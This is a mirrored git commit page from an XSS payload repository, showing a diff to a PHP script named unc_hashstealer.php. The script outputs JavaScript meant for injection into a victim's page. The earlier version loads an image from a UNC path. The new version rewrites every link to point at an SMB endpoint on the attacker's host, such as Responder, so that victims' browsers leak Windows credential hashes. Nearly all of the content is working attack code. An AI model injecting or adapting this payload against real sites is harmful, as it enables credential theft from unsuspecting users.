Mirrors/xss_payloads
2
0
Fork 0
mirror of https://github.com/nettitude/xss_payloads.git synced 2024-11-10 06:34:14 +00:00
Code Issues Projects Releases Packages Wiki Activity

Changed UNC hash stealer to re-write all links on the page to UNC path

Browse source
This commit is contained in:
Strawp 2016-08-02 17:05:09 +01:00
parent 298e52fccd
commit 2d31072193
1 changed files with 7 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
unc_hashstealer.php
View file

@ -1,8 +1,12 @@
<?php
/**
* Inject this in order to have the browser call out to an SMB endpoint, e.g. Responder
* Inject this in order to have all "a" links on the page reassigned to point to the SMB endpoint (e.g. Responder) on the host this script is running on
*/
$url = "file:///\\".$_SERVER["SERVER_ADDR"];
$url = "file:///\\\\".$_SERVER["SERVER_ADDR"]."/page";
echo "// $url\n";
?>
new Image().src="<?php echo $url; ?>";
col = document.getElementsByTagName('a');
for( var i in col ){
el = col[i];
el.href = '<?php echo $url; ?>';
}